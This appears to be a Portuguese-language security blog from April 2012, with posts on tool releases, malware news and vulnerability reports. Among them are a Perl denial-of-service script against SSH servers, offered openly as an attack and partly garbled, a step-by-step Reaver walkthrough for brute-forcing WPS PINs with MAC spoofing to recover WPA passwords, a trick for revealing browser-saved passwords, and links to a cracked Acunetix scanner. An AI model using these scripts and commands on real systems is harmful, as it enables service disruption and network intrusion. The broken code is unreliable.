quinta-feira, 26 de abril de 2012

Monitoramento e Detecção de Intrusão no formato EaD

A OYS acaba de informar que só tem 3 vagas para o seu treinamento de Monitoramento de Sistemas e Detecção de Intrusão. Vejam a sua ementa:
  • Utilização do SYSLOG-NG
  • Administração e monitoramento de logs e evento no sistema
  • Logs locais e remotos
  • Gerenciamento de Servidores de Logs
  • Definindo política de rotacionamento de logs
  • HIDS (Host Intrusion Detection System)
  • Entendendo um HIDS; Instalação e Configuração do OSSEC
  • Instalação e Configuração de interface web para gerenciamento dos logs do OSSEC
  • Implementação de Sistema de Monitoramento
  • Entendendo os sistemas de monitoramento
  • Ferramentas utilizadas
  • Instalação e configuração do Nagios
  • Plugins do Nagios
  • IDS / IPS (Network Intrusion Detection System / Intrusion Prevention System)
  • Entendendo um NIDS e um IPS
  • Instalação e Configuração do Snort Inline
  • Instalação e Configuração do BarnYard2
  • Instalação e Configuração do Snorby
  • Instalação e Configuração do PulledPork
  • Criação de regras para o Snort
Mais informações no seguinte link.


Ref:  Coruja de TI

quarta-feira, 25 de abril de 2012

Liberado winAUTOPWN 0.3



WinAUTOPWN e bsdAUTOPWN são frameworks bastantes interativos, que funcionam como uma interface para sistemas destinados à exploração de vulnerabilidades. Para seu funcionamento, é necessário a presença de insumos como endereço IP, Hostname, Paths CMS, e fazer um portscan multi-threaded inteligente para portas TCP 1 a 65535. Nessa sequência, exploits capazes de dar shells remotos, que são liberados publicamente através da Internet pelos contribuintes ativos e de exploração, são escritos constantemente e adicionados ao winAUTOPWN / bsdAUTOPWN. 

Muitas dessas façanhas são escritas em linguagens de script como Python, Perl e PHP. A presença desses intérpretes de linguagem é essencial para que ocorram explorações bem-sucedidas ao utilizar o winAUTOPWN / bsdAUTOPWN. Explorações de componentes escritos em linguagens como C, Delphi, ASM, podem ser compilados e pré-compilados. Quando ocorre uma exploração bem sucedida utilizando o winAUTOPWN / bsdAUTOPWN, é acionado um shell remoto e partir daí, aguarda-se que o atacante use o shell antes de tentar realizar outras façanhas.

Desta forma, o atacante pode contar e verificar o número de
exploits com os quais realmente trabalhou em um sistema de destino. Lembrando que winAUTOPWN é usado para técnicas de autohack, com a mínima interação possível relacionada a seus alvos. Todas as mudanças incorporadas a versão 0.3, estão disponíveis a partir de seu  ChangeLog.

Download:  winautopwn.co.nr

Ref:   Pentestit

terça-feira, 24 de abril de 2012

Liberado Firefox 12

Firefox 12 Traz Serviços de Manutenção para Atualizar Arquivos

A Mozilla anunciou hoje, dia 24 de abril, o lançamento oficial do Firefox 12. No mais recente lançamento, a empresa incluiu o previamente anunciado serviço de atualização para o Windows que não livra os usuários do pop-up User Account Control (UAC). Como o Firefox está instalado no diretório de programas, ele requer privilégios elevados para que seja realizada a atualização. 

Ao invés de pedir para os usuários os privilégios necessários via UAC, ele agora utiliza o Serviço de Manutenção da Mozilla para atualizar os arquivos do programa. Firefox executa o serviço com privilégios de sistema sempre que for necessário, e o encerra após a atualização. Além disso, uma entrada de controle de acesso (ACE) no serviço de atualização, permite que o Firefox possa iniciá-lo com privilégios de sistema, mesmo que o próprio navegador não os ofereça.

Outra inovação incorporada ao Firefox 12, é que os utilizadores podem ativar ou desativar o serviço no menu Firefox em Opções - Avançado - Atualizações (utilizando um serviço de fundo para instalar as atualizações). Quando este serviço é combinado com a opção "instalar atualizações automaticamente", o Firefox toma conta do processo da versão de manutenção por conta própria, em sua maior parte. Firefox 12 está disponível para download para Windows, Mac OS X e Linux e pode ser baixado para diferentes sistemas e linguagens.



Ref:  Mozilla Blog


Acunetix Web Vulnerability Scanner 8 build 2012.02.09 + patch

Examine seu site com segurança Acunetix Web Vulnerability Scanner

Tal como muitos como 70% dos sites possuem vulnerabilidades que podem levar ao roubo de dados corporativos sigilosos, como informações de cartão de crédito e listas de clientes.

Os hackers estão concentrando seus esforços em aplicações baseadas na web - carrinhos de compras, formulários, páginas de login, conteúdo dinâmico, etc acessível 24/7 em qualquer lugar do mundo, as aplicações web inseguras proporcionam fácil acesso a bancos de dados back-end corporativos.

Firewalls, servidores SSL e bloqueado são inúteis contra a pirataria de aplicações web!


Ataques a aplicações Web, lançado em porta 80/443, siga em frente através do firewall do sistema operacional, o passado eo nível de segurança de rede, e à direita para o coração de sua aplicação e dados corporativos. Aplicações web sob medida não são adequadamente testadas, têm vulnerabilidades desconhecidas e são, portanto, presa fácil para hackers.


Acunetix - líder mundial em segurança de aplicações web


Acunetix foi pioneira na tecnologia de segurança web aplicativo de digitalização: Seus engenheiros concentraram-se em segurança na web já em 1997 e desenvolveu uma vantagem de engenharia na análise de web site e detecção de vulnerabilidades.


Acunetix Web Vulnerability Scanner inclui muitas características inovadoras:


Tecnologia AcuSensor
Um analisador de script automático cliente permitindo testes de segurança de Ajax e aplicações da Web 2.0
Mais avançada e em profundidade das indústrias de injeção SQL e cross-site scripting testes
Ferramentas de penetração avançadas de testes, tais como o Editor HTTP eo Fuzzer HTTP
Visual macro recorder faz testes formulários da web e senhas fáceis de áreas protegidas
Suporte para páginas com CAPTHCA, single sign-on e dois mecanismos de autenticação de fator
Extensas instalações de relatórios, incluindo relatórios de conformidade PCI VISA
Multi-threaded e scanner muito rápido rastreia centenas de milhares de páginas com facilidade
Inteligente rastreador detecta o tipo de servidor web e linguagem de aplicação
Acunetix rastreia e analisa sites, incluindo conteúdo em Flash, SOAP e AJAX
Porto analisa um servidor web e executa as verificações de segurança contra os serviços de rede em execução no servidor 


Download:

DepositFiles: Acunetix 8 + Patch

RapidShare:  Acunetix 8 + Patch 

segunda-feira, 23 de abril de 2012

Como descobrir senhas gravadas no navegador

Esta dica tem como objetivo apenas demonstrar que, ao contrário do que a maioria pensa, o Google Chrome, tão aclamado como o mais seguro, não é tão seguro como a gente desejava que fosse.

Suponhamos que você queira descobrir uma senha que está gravada (modo autocompletar) no Google Chrome, #ComoFaz?
Abra o navegador e vá para a página que deseja revelar a senha (ex: Google GMail)


Selecione a senha gravada (com dois cliques) e clique com o botão direito sobre ela e escolha a opção INSPECIONAR ELEMENTO.
Agora veja que vai se abrir uma janela fixa na barra inferior, clique no código <input type=”Password” name=”Passwd” id=”Passwd”>



Dê dois cliques em Password (que aparece logo após type=) e apague.
Agora observe que o conteúdo da máscara alterou de ****************, revelando a senha oculta.



Fizemos testes com o Internet Explorer 8 e 9


E com o Mozilla Firefox 12



E ambos garantem que sua senha fique onde deve ficar: longe dos olhos.
Faça seu teste conte-nos o resultado.


Ref:  Veia Digital

Nível de Importância do Hacking Ético



Ataques à sistemas operacionais, roubo de informações confidenciais, disseminação de worms e trojans: essas são algumas provas de que está cada vez mais evidente, a necessidade de implementar práticas eficazes na área da segurança da informação. Essas práticas mais enérgicas (pelas quais a área da segurança anseia), precisam dar um freio na ação dos criminosos cibernéticos, pois o número de vulnerabilidades encontradas nos meios de comunicação tem sido assustador.

A partir do momento em que são adotadas novas tecnologias como
cloud computing, virtualização, ou terceirização de serviços da área de TI, as empresas estão enfrentando ameaças de segurança iminentes e precisam fazer um ajuste em seus processos de segurança, em suas políticas e arquiteturas de conformidade. Dentre as muitas opções disponíveis para ajudar os clientes a alcançar este objetivo, as organizações devem considerar o valor dos serviços de hacking ético, que estão rapidamente ganhando atenção. Esses serviços são vistos como uma prática de segurança essencial, devendo ser realizados em uma base regular.

De acordo com a ênfase de Chris Rodriguez, analista industrial da Frost & Sullivan, "a crescente sofisticação e taxa de sucesso de recentes ataques cibernéticos, está diretamente relacionada com a mudança no perfil dos atacantes. Isso indica que os estados-nação e grandes organizações criminosas estão financiando de forma bastante organizada, uma equipe de programadores motivados e muito bem treinados.

Rodriguez também diz que "o grande cenário de ameaças demanda com uma certa urgência, a necessidade de uma abordagem global; isso requer também a avaliação do mundo real através de uma postura organizacional mais rigorosa". Essa avaliação é um passo vital para implementar políticas de segurança eficazes, procedimentos inovadores e uma infra-estrutura mais sólida, que irá prevenir ou mitigar os efeitos de uma violação de dados.


Prioridade às Técnicas de Hacking Ético

O grande desafio para as empresas é a complexidade das exigências de segurança devido às mudanças das táticas de hacking. Isso está relacionado com as vulnerabilidades de segurança em evolução, com as tecnologias implantadas a novos negócios e tecnologias emergentes de segurança. Esses inúmeros desafios específicos das organizações em questão, são melhor resolvidos por profissionais com vasta experiência.

Nesse importante contexto, o
hacking ético oferece uma análise objetiva sobre o posicionamento de uma organização com foco em segurança da informação, para organizações de qualquer nível de experiência em segurança. Portanto, os hackers devem procurar pontos fracos, pontos de entrada de teste, priorizar metas e desenvolver uma estratégia que melhor aproveite os seus recursos. A objetividade desse tipo de análise relacionada a segurança, tem um impacto direto sobre o valor de toda a avaliação realizada.

Empresas se Preocupam com Confidencialidades de Dados

Como as organizações de todos os portes e níveis de sofisticação podem se beneficiar com o trabalho de peritos e até mesmo de terceiros, o processo de análise do hacking ético tornou-se um serviço mais popular na década passada. No entanto, as empresas ainda permanecem céticas sobre o risco inerente de convidar um terceiro, para tentar acessar sistemas sensíveis.

Entretanto, com a intenção de eliminar esse medo, as empresas devem contratar somente empresas de
hackers éticos que implementem práticas para garantir a privacidade e confidencialidade das informações. "Eles também devem ter credibilidade com as organizações internacionais de comércio, como a EC-Council e ISC", aconselha Rodriguez.


Ref: Net Security

quarta-feira, 18 de abril de 2012

Quase 190 mil sites estão infectados com nova praga

Script malicioso estaria atacando páginas construídas na linguagem ASP.

Depois de uma infecção de enormes proporções ter atingido os sites com plataforma Wordpress, agora é a vez das páginas montadas em ASP sofrerem ataques de códigos maliciosos. Um script que está sendo chamado de Nikjju – por ter sido hospedado em um domínio homônimo – realiza uma injeção massiva de SQL nas páginas, gerando acesso irrestrito em diversos bancos de dados.

Isso permite que os softwares maliciosos tenham acesso aos bancos de dados dos sites invadidos. Inserindo códigos neles, links para falsos antivírus são mostrados e muitos internautas acabam sendo infectados por outros malwares. Segundo o relatório publicado pela empresa de segurança Sucuri, até o momento já se passaram dos 188 mil sites infectados, sendo que o número não para de crescer.


Ref:   TecMundo

Disponível Nessus 5.0.1





Está disponível a versão 5.0.1 do Nessus, a solução desenvolvida para avaliação de vulnerabilidades para as empresas e os profissionais de segurança. Esta versão melhora muito a estabilidade em todas as plataformas, e resolve questões específicas do Windows, relacionadas à instalação e à falsificação de pacotes. Do ponto de vista do usuário, a única mudança é que agora é possível especificar uma lista separada de portas UDP e TCP, para fazer a varredura em todos os alvos. Isso é definido no campo "Port Scanner Range" quando você cria uma nova política ou modificar uma já existente.

 Compondo os aprimoramentos e correções de falha implementados nesta mais nova versão, está a resolução de um problema relacionado à falsificação de pacotes, envolvendo também algumas configurações do Windows. Na sequência de mudanças, houve melhorias no instalador do Windows, que apresentava em alguns setups; correção de problemas de sincronização de várias threads que podiam levar a um acidente em determinadas situações.

Nessus 5.01 também apresenta importação de relatórios (v1) de forma mais legível, além de poder fazer a leitura de um banco de dados de 64-bits a partir de um sistema de 32-bits e vice-versa. Houve ainda a identificação e resolução de um problema de vazamento de memória menor, ocorrendo em todas as plataformas.


Ref:   Help Net Security

Computador de US$25~US$35 ou R$ 60~R$80 ja começaram a ser vendidos.












A Raspberry Pi Foundation anunciou um modelo de computador que custa apenas US$ 25, ou seja, aproximadamente R$ 48. Carregando o mesmo nome da empresa que o criou, a máquina é do tamanho de um pendrive e tem lançamento marcado para janeiro de 2012. O objetivo do PC, segundo o fabricante, é estimular a compra por escolas para auxiliar na inclusão digital dos pequenos.

Todos os componentes do Raspberry Pi estão contidos em uma única placa, que não conta com peças móveis. A máquina conta com um cartão SD para armazenamento de dados, uma porta USB e uma saída HDMI. As configurações são as seguintes:
  • Processador ARM de 700 MHz;
  • 256 MB de memória RAM;
  • Sistema operacional Linux.
Há também uma segunda versão do Raspberry Pi, intitulada Model B, que conta com 256 MB de memória RAM, duas entradas USB e uma porta Ethernet, para conexão de um cabo de rede. O preço é um pouco maior, mas continua baixo: US$ 35, aproximadamente R$ 65.

O preço, as configurações modestas e o tamanho transformam o Raspberry Pi em uma boa opção para tarefas básicas, como acesso à internet e edição de documentos. A fabricante, porém, não tem a intenção de lançar a máquina para o usuário final.




Site da empresa:  Raspberry pi

Detalhes sobre o produto:   Raspberry pi - FAQS

terça-feira, 17 de abril de 2012

Lançado Social Engineer Toolkit 3.2.3










Foi liberada nesta segunda-feira, a versão 3.2.3 para o Social Engineer Toolkit (SET). Essa ferramenta, como grande parte dos profissionais e entusiastas da área de segurança sabe, consiste em uma suíte

personalizada python-driven, concentrada em facilitar a realização de testes, avaliações e ataques com referência à engenharia social e testes de penetração bem sucedidos. Este importante utilitário foi desenvolvido com a intenção de munir os pentesters e pesquisadores de segurança, com a capacidade de testar, de forma efetiva, ataques avançados de engenharia social que utilizam métodos lógicos.
 
SET aproveita múltiplos vetores de ataque que se prevalecem do elemento humano de segurança em um esforço para atingir os atacantes. Nesta versão, foram corrigidas falhas altamente crítica relacionada ao shell interativo, no novo sistema de menu em payloads, além da adição de Atomic Java, Adobe Flash mp4, e exploits MS12-004. Além disso, a nova versão de SET apresenta melhor estabilidade caso uma conexão seja interrompida de forma prematura.
 
 
Download:   svn co http://svn.secmaniac.com/social_engineering_toolkit set/
 
Ref:  
 
 

Cibercriminosos Propagam Phishing no Twitter


De acordo com uma pesquisa feita pela ESET, foi identificado um novo tipo de ataque virtual que tem como alvo os usuários do serviço de micro-blog Twitter. O golpe trata-se de um phishing, que como a maioria sabe, tem como objetivo o roubo de dados confidenciais dos usuários. A prática já teria atingido mais de 31 mil internautas em todo mundo. O ataque utiliza a Engenharia Social, técnica na qual os cibercriminosos se aproveitam da curiosidade das vítimas para induzi-las a clicar em links maliciosos. Nessa situação específica, o golpe usa tweets em inglês que envolvem rumores ou tragédias, com o objetivo de chamar a atenção dos usuários do micro-blog. Os mais desatentos, acabam clicando e visitando o endereço eletrônico fraudulento.

Quando a vítima clica no link contido nas mensagens falsas, elas entram em uma página, na qual recebem a informação de que a sua conta do Twitter está inativa. A partir daí, elas são induzidas a inserir o seu login e senha pessoal, caso queiram a se conectar à rede social. Os cibercriminosos querem mesmo é roubar as credenciais de acesso de suas vítimas.

De acordo com as declarações dos especialistas da ESET, até o momento, os cibercriminosos utilizaram somente frases no idioma inglês para propagar o phishing. Porém, há uma grande possibilidade de que eles migrem para outros idiomas incluindo o português, para publicar as mensagens maliciosas. Portanto, é necessário que os usuários do twitter redobrem suas atenções.


Ref:  Convêrgencia Digital

OSX / Sabpab-A: Novo Malware para Mac OS X

A especialista em segurança Sophos, emitiu um importante relatório no qual consta a descoberta de um novo malware para Mac. Esse malware explora uma brecha de segurança (Java) no Mac OS X, que também foi utilizada pelo trojan "Flashback" e desde então, foi corrigida pela Apple. O novo trojan backdoor é chamado de "OSX/Sabpab-A", e estabelece uma conexão HTTP para um servidor de comando e controle, a partir do momento em que tenha infectado um computador. 

Comandos Arbitrários e Propagação via Web

De acordo com o pesquisador Graham Cluley, da Sophos, os atacantes, serão capazes de executar comandos arbitrários, realizar upload e download de arquivos e tirar screenshots nos sistemas infectados. A empresa de segurança diz que assim como o Flashback, o malware "OSX / Sabpab-A" se espalha através da Web. De forma aparente, basta visitar uma página Web maliciosa em um Mac com uma versão não corrigida do Java: isso é tudo o que é necessário para se tornar infectado.

Atualizando e Protegendo o Sistema

Os usuários podem proteger seus sistemas, instalando as últimas atualizações do Java, que corrige o problema e automaticamente, desativa o plugin Java web por padrão. Dessa forma, os usuários podem reativá-lo através da aplicação
Java Preferences.


Ref:  Sophos

Vulnerabilidade Crítica Detectada no IrfanView





O plug-in para o popular visualizador de imagens IrfanView, está sendo atualmente disponibilizado através de uma versão vulnerável do FlashPix. O código contém uma vulnerabilidade crítica, que poderia ser explorada por um atacante para infectar um sistema com código malicioso. Essa brecha de segurança é causada devido a um buffer overflow. Para que a ação seja bem sucedida, um atacante precisa obter um aplicativo que abra uma imagem no formato especialmente criado para a finalidade maliciosa. Dessa forma, ele poderá conseguir o código a ser executado. 

Evidentemente, este é um formato de arquivo relativamente raro, que não pode ser aberto de forma deliberada. Porém, a abertura do arquivo também pode ocorrer inconscientemente; por exemplo, quando se olha para uma pasta cheia de imagens e faz uma busca de seus thumbnails com IrfanView. Diante do problema ocorrido, houve a correção do mesmo na versão 4.34 do pacote de plug-in, mas a reinstalação deve ser feita manualmente.

A diferença foi descoberta pelo pesquisador de segurança Francis Provencher, que informou (de forma confidencial) a Secunia. Desde então, ele lançou uma prova de conceito, o que significa que os usuários do IrfanView que instalaram o pacote de plugin, devem atualizar o mais rápido possível para a versão de manutenção. Vale lembrar que exatamente há um mês, um problema semelhante no visualizador de imagens XnView também foi corrigido.

PacketFence 3.3.0

No último dia 14 de abril, foi liberada a versão 3.3.0 do PacketFence. Esta versão de lançamento é considerada estável e pode ser utilizada em ambientes de produção. Como muitos conhecem o utilitário, sabem que PacketFence é uma solução de código aberto Network Access Control (NAC), totalmente suportada, além de oferecer gratuidade e alta confiabilidade. Além disso, a ferramenta possui um conjunto de características muito interessantes, incluindo um captive-portal para registro e remediação, gerenciamento centralizado incluindo rede wireless, suporte a 802.1X, isolamento layer-2 de dispositivos que apresentarem problemas e integração com Snort IDS e Nessus.

Vale lembrar que PacketFence pode ser utilizado, efetivamente de forma segura em redes de pequeno porte até grandes redes heterogêneas. Na versão 3.3.0, houve algumas modificações incluindo Switches AlliedTelesis AT8000GS utilizando 802.1x/Mac Authentication sem VoIP, adição de suporte à 802.1X/MAC Authentication, incluindo switches HP 2500/2600 (no VoIP), entre outras mudanças que envolvem a linha de produtos Cisco WLC/WiSM e suporte a RADIUS. 


Download:  PacketFence

Ref:  Under Linux

Disponível Mitmproxy 0.8

Mitmproxy, uma das ferramentas de segurança de grande utilidade para os testadores de invasão, já disponibilizou a sua versão 0.8. A ferramenta possui uma enorme interatividade, e como o seu próprio nome sugere, trata-se de um proxy man-in-the-middle (HTTP), com habilidades do protocolo criptográfico SSL (Secure Sockets Layer). Além disso, mitmproxy apresenta uma interface de console, que possibilita que o tráfego de informações seja inspecionado e até mesmo alterado, em modo on-the-fly. Além do mitmproxy, há também o mitmdump, que é a sua versão de linha de comando. Ele apresenta as suas mesmas funcionalidades, porém, com menos sofisticação.

A ferramenta em questão possui a capacidade de interceptar e modificar o tráfego HTTP em tempo real, salvar conversações para realizar uma análise posterior ou até mesmo reprodução das mesmas, dar replay em clientes e servidores HTTP, realizar mudanças em um script para o tráfego HTTP utilizando Python, além de interceptação via SSL em modo on-the-fly. Nesta versão lançada, houve a implementação de suporte para auto recuo de JavaScript , inspeção de imagem de dados EXIF, e outras alterações relacionadas.

O release também traz exibição de detalhes para os fluxos, mostrando conexão e informações cert SSL (X keyboard shortcut - atalho de teclado). Os certificados de servidor são armazenados e serializados para que seja feita uma análise. Isto significa que o formato de serialização 0.8 não é compatível com o da versão anterior, a 0.7.


Download:  MitmProxy 0.8

Ref:   Under Linux

Liberado NetworkMiner 1.3






NetworkMiner, como é do conhecimento de muitos profissionais de segurança, principalmente os da área forense computacional, é uma ferramenta de análise forense de rede (NFAT) desenvolvida para o Windows. Essa ferramenta pode ser utilizada como um sniffer de rede e com finalidades de captura de pacotes, para detectar sistemas operacionais, sessões, hostnames e portas abertas, sem que haja qualquer interferência em relação ao tráfego na rede.

Além disso, o utilitário também pode avaliar arquivos pcap para análise off-line, e para regenerar / remontar os arquivos transmitidos e certificados a partir desses arquivos. NetworkMiner também realiza coleta de dados (como evidências forenses) sobre os hosts da rede, ao invés de coletar dados sobre o tráfego na rede. A principal interface do usuário é host centric (informações agrupadas por host).

Nesta versão 1.3, houve extração de user names a partir do
HTTP Digest Authentication (RFC 2617), exibição de headers HTTP exibidos a partir da guia Parameters (incluindo os cabeçalhos comuns como "Host" e "User-Agent"), suporte para packet layer links Null / Loopback que são escritos em casos de "sniffing localhost" em sistemas operacionais BSD.


Download:  NetworkMiner 1.3

Ref:   Under Linux

BeEF (Browser Exploitation Framework) 0.4.3.3


O Browser Exploitation Framework, também conhecido como "BeEF", é uma poderosa ferramenta de segurança que foi projetada para uso profissional. Esse utilitário é pioneiro em técnicas que fornecem pentesters as melhores práticas (do lado do cliente) relacionadas aos vetores de ataque colaterais. Ao contrário de outras estruturas de segurança, BeEF concentra-se em alavancar as vulnerabilidades do browser, para que possa avaliar a postura de segurança de um determinado alvo. Além disso, este projeto é desenvolvido exclusivamente para a investigação legal e para realizar testes de penetração. 

Dentre as características mais notáveis de BeEF, está uma estrutura facilmente integrável que demonstra o impacto do navegador e questões relacionadas com vulnerabilidades de Cross-Site Scripting (XSS) em tempo real. O desenvolvimento do utilitário tem sido concentrado na criação de uma estrutura modular, e isso fez com que o desenvolvimento do módulo de um processo se tornasse muito mais rápido e simplificado. 


Download:  BeEF 0.4.3.3

Ref:  Under Linux

domingo, 15 de abril de 2012

Angry Birds com Trojan Oferecido para Download



A extrema popularidade do jogo móvel Angry Birds da Rovio, e suas edições especiais, tornaram-se perfeitos para atrair usuários desatentos a fazer downloads com malware. Devido a essa falta de atenção, os cibercriminosos adicionaram ao game uma versão com cavalo de tróia (AndryBirds Space), que recentemente foi descoberto por pesquisadores da especialista em segurança Sophos. Essas versões, estão sendo oferecidas em um grande número de lojas não oficiais que distribuem aplicativos Android.

Os usuários que baixarem a versão podem até não perceber que tenham feito download de um aplicativo malicioso, devido ao pacote parecer uma versão totalmente funcional do jogo. Isso porque ele traz o nome e o ícone do aplicativo correspondentes aos utilizados pelo aplicativo legítimo, que foi lançado em 22 de março deste ano. Ao fazer o download, o dispositivo é automaticamente comprometido.

Em seguida, ele fica à mercê dos cibercriminosos responsáveis pela propagação do malware, e efetivamente, fazendo parte de uma botnet. Os criminosos podem fazer download de qualquer pacote adicional que eles quiserem ou direcionar o navegador para qualquer página da Web que eles escolherem. Como sempre, os usuários são aconselhados a ter cuidados extras ao baixar aplicativos de mercados online não-oficiais.


 Ref:  Under Linux

Corrigida Falha 0-Day no BackTrack Linux


A vulnerabilidade Zero-Day que afetou a última versão da ferramenta de segurança Backtrack Linux, foi descoberta por um aluno durante uma aula de Ethical Hacking, que é organizada pelo Instituto InfoSec. A descoberta foi divulgada no site InfoSec e detalhada pelo próprio aluno, que disse que os componentes Wireless Interface Connection Daemon (WICD) Backtrack tem várias falhas de projeto. Essas vulnerabilidades podem ser exploradas indevidamente, apara executar uma escalada de privilégios

De acordo com a explicação dada pelo aluno, "a limpeza inadequada das entradas em interfaces DBUS Wicd's, permite que um atacante escreva, arbitrariamente, opções de configuração em Wicd do arquivo 'settings.conf sem fio". Isso inclui scripts de definição de forma não limitada (na verdade, executáveis​​), para colocar em prática em diversos eventos internos, como por exemplo, na conexão a uma rede sem fio.

O que acontece é que estes scripts são executados como usuário
root, o que leva à execução de código/comando arbitrário por um atacante que tenha acesso à interface do Wicd DBUS como usuário root. O estudante e a equipe da InfoSec, imediatamente, começaram a trabalhar em um exploit de prova de conceito e o patch para a vulnerabilidade, todos estando disponíveis a partir do site do grupo.

Backtrack, como muitos sabem, é uma distribuição Linux bastante popular e utilizada por testadores de penetração em todo o mundo, porque vem pré-carregada com centenas de ferramentas de segurança de enorme utilidade. A vulnerabilidade 0-Day descoberta, afeta a versão mais recente do sistema, o Backtrack R2 5. Sendo assim, os usuários podem usar o
patch oferecido pelo grupo ou melhor ainda, atualizar Wicd para a nova versão (1.7.2), que corrige a vulnerabilidade.


Ref:   Under Linux

Ransomware Bloqueia Computadores na Inicialização


A especialista em segurança Trend Micro, já descobriu a existência de um ransomware que bloqueia o sistema a partir do momento de sua inicialização. Em contraste com os trojans localizados que são amplamente espalhadas por toda a Europa, esse malware faz a sua própria inserção no Master Boot Record (MBR). Em seguida, ele reinicia o sistema de sua vítima e instrui a pagar um resgate de 920 hryvnias ucranianas (o equivalente a cerca de 90 euros) para os criminosos, através de serviços de pagamento QIWI.

Se a vítima efetuar o pagamento, os criminosos vão enviar-lhe um código para desbloquear seus computadores. Os usuários podem, no entanto, salvar-se do pagamento do valor estipulado pelos cibercriminosos, seguindo as instruções dos peritos para remover a infecção. Isso consiste, essencialmente, em executar o console de recuperação a partir do DVD de instalação do Windows e restaurar o MBR original utilizando o comando fixmbr.


Ref:  Under Linux

"Denial of Service" em SSH




Vamos dizer que esse script faz um Denial of Service no SSH um pouco diferente, se alguem tentar se logar enquanto rodamos o script ele da erro que a conexao foi resetada pelo hos(Connection closed by remote host)

Código do Script

#!/usr/bin/perl
## I needed a working test script so here it is.
## just a keep alive thread, I had a few problems with Pablo's code running properly.
##
## Straight from Pablo Fernandez's advisory:
# Vulnerable code is in svr-main.c
#
# /* check for max number of connections not authorised */
# for (j = 0; j < MAX_UNAUTH_CLIENTS; j++) {
# if (childpipes[j] $serv,
PeerPort => $port,
Proto => 'tcp',
);

die "Não foi possivel realizar ataque: $!\n" unless $sock;
sleep $sleep;
close($sock);
}

sub thread {
system "clear";
print "\fSiga-me no twitter [@]unknown_antisec\n\nIP: $serv\nPorta: $port\nSegundos: $time\n";
for my $i ( 1 .. 51 ) {
print ".";
my $thr = new Thread \&exploit, $serv, $port, $time;
}
sleep $time;
}
if (@ARGV != 3){&usage;}else{&thread;}


Ref: UnknownAntiSec

sábado, 14 de abril de 2012

Facebook: como colocar seu nome na URL do seu perfil

O Facebook pode ser uma excelente ferramenta de comunicação, ainda mais para quem utiliza a rede social para se conectar com parceiros de trabalho e outros contatos profissionais. Mas é preciso convir que em alguns casos não é nada fácil pedir para alguém adicionar o seu perfil, ainda mais quando a URL da sua conta é um grande número.

Pensando nisso, o Facebook adicionou uma configuração que permite a colocação de seu nome de usuário no link. Isso já é possível há algum tempo, mas agora o Tecmundo preparou este pequeno tutorial para mostrar como realizar o mesmo processo em sua própria conta. Não é preciso instalar nenhum app adicional, apenas seguir alguns rápidos passos.

1. Já logado em seu perfil, clique sobre a seta que se encontra no canto superior direito e em seguida sobre o botão “Configurações de conta”;


 2. Na nova janela, clique sobre o botão “Editar” que está ao lado de “Nome de usuário”;


3. Um novo quadro será aberto. Nele, escolha um nome de usuário para seu perfil – vale lembrar que ele nunca poderá ser modificado. Caso esteja disponível, você só precisará inserir sua senha e então clicar em “Salvar alterações”;



4. Pronto! Sua conta já foi alterada.


Ref:  TecMundo

Ufa! Dados do Megaupload não serão deletados de servidores

Juiz decide pela preservação dos arquivos, mas nada foi dito sobre devolução de links.


A Sexta-Feira 13 trouxe uma ótima notícia para quem mantinha arquivos no Megaupload que não infringiam leis de direitos autorais, mas estava impedido de acessar dados e corria o risco de ter tudo apagado. De acordo com o PC Mag, o juiz encarregado de decidir o futuro desse conteúdo determinou que todos os 25 petabytes armazenados em uma série de servidores serão preservados até segunda ordem.

O julgamento, que ocorreu no início da tarde de hoje, foi a oportunidade para que representantes de entidades contra a pirataria e advogados do Megaupload defendessem seus respectivos pontos de vista. Apesar da posição favorável, a novela continua: nada foi falado sobre a devolução de documentos hospedados ou da reabertura parcial do site para a recuperação desses arquivos, por exemplo.


Ref:  TecMundo

sexta-feira, 13 de abril de 2012

Facebook aumenta opções para que usuário baixe suas informações

Download incluirá endereços de onde usuário acessou a rede social.
Desde 2010, Facebook permite download de histórico virtual.

O Facebook anunciou nesta quinta-feira (12) que aumentou o número de informações que os usuários poderão baixar de suas contas na rede social.

Desde 2010, quem quiser guardar seu histórico virtual tem a opção de fazer o download de informações como fotos, posts, mensagens, a lista de amigos e os bate-papos.
A partir de agora, diz o Facebook, o usuário poderá baixar categorias adicionais de dados como os endereços de IP de onde acessou a rede, as requisições de amizade e os nomes anteriores colocados no perfil.

“A função será disponibilizada aos poucos para os usuários e mais categorias de informação estarão disponíveis para download no futuro”, informou a rede social. Para baixar os dados, o usuário deve ir até a sessão de configurações do Facebook.

Wi-Fi Protected Setup (WPS) exploit – CVE-2011-5053

Reaver implementa um ataque de força bruta contra PINs de WiFi Protected Setup (WPS) , a fim de recuperar senhas WPA/WPA2, conforme descrito aqui.
Reaver foi concebido para ser um ataque robusto e prático contra WPS, e foi testado contra uma ampla variedade de access point e implementações WPS.Em média Reaver irá recuperar do access point o texto simples WPA/WPA2  passphrase em 4 a 10 horas, dependendo da access point. Na prática, geralmente leva metade desse tempo para adivinhar o WPS correto e recuperar a senha.




Instalação

Reaver é suportado apenas na plataforma Linux, requer as libs libpcap e libsqlite3, e pode ser construído e instalado pelo comando:

$ ./configure
$ make
# make install


Uso Básico

Primeiro, verifique se sua placa wireless está em modo monitor:# airmon-ng start wlan0Para executar Reaver, você deve especificar o BSSID do alvo AP eo nome da interface de modo monitor (geralmente “mon0 ’, não’ wlan0 ’, embora isto pode variar dependendo de sua placa wireless / drivers):# reaver -i mon0 -b 00:01:02:03:04:05
Você pode também querer usar -vv para obter informação detalhada sobre o andamento Reaver:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Acelerando o ataque

Por padrão, Reaver tem um atraso de 1 segundo entre as tentativas dos pins. Você pode desativar esse atraso, adicionando ”-d 0″ na linha de comando, mas alguns APspodem não gostar:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Outra opção que pode acelerar um ataque é –dh-small. Esta opção instrui Reaver para usar pequenos números de Diffie-Hellman secretos, a fim de reduzir a carga computacional sobre o alvo AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC Spoofing

Em alguns casos você pode querer/precisar falsificar o endereço MAC. Reaver suporta MAC spoofing com a opção –mac, mas você deve garantir que você tenha falsificado o seu MAC corretamente para que ele funcione.


Alterando o endereço MAC da interface virtual modo monitor (normalmente chamado mon0) não funcionará. Você deve alterar o endereço MAC da interface física de sua placa wireless. Por exemplo:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69



Download: Reaver 1.4

Ref:  Unknown AntiSec

